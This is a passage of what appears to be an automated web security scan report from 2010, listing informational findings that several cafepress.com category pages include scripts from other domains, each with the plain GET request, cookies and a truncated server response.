cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 60337
Date: Sun, 26 Dec 2010 13:44:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/
Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.35. http://www.cafepress.com/+thermos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+thermos

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58876
Date: Sun, 26 Dec 2010 13:47:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.36. http://www.cafepress.com/+underwear-panties previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+underwear-panties

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59386
Date: Sun, 26 Dec 2010 13:46:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.37. http://www.cafepress.com/+water-bottles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+water-bottles

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 60982
Date: Sun, 26 Dec 2010 13:47:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.38. http://www.cafepress.com/+womens-tank-tops previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+womens-tank-tops

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59652
Date: Sun, 26 Dec 2010 13:44:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content0.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.39. http://www.cafepress.com/+womens-thongs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+womens-thongs

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 61274
Date: Sun, 26 Dec 2010 13:47:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.40. http://www.cafepress.com/+yoga-mats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+yoga-mats

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; 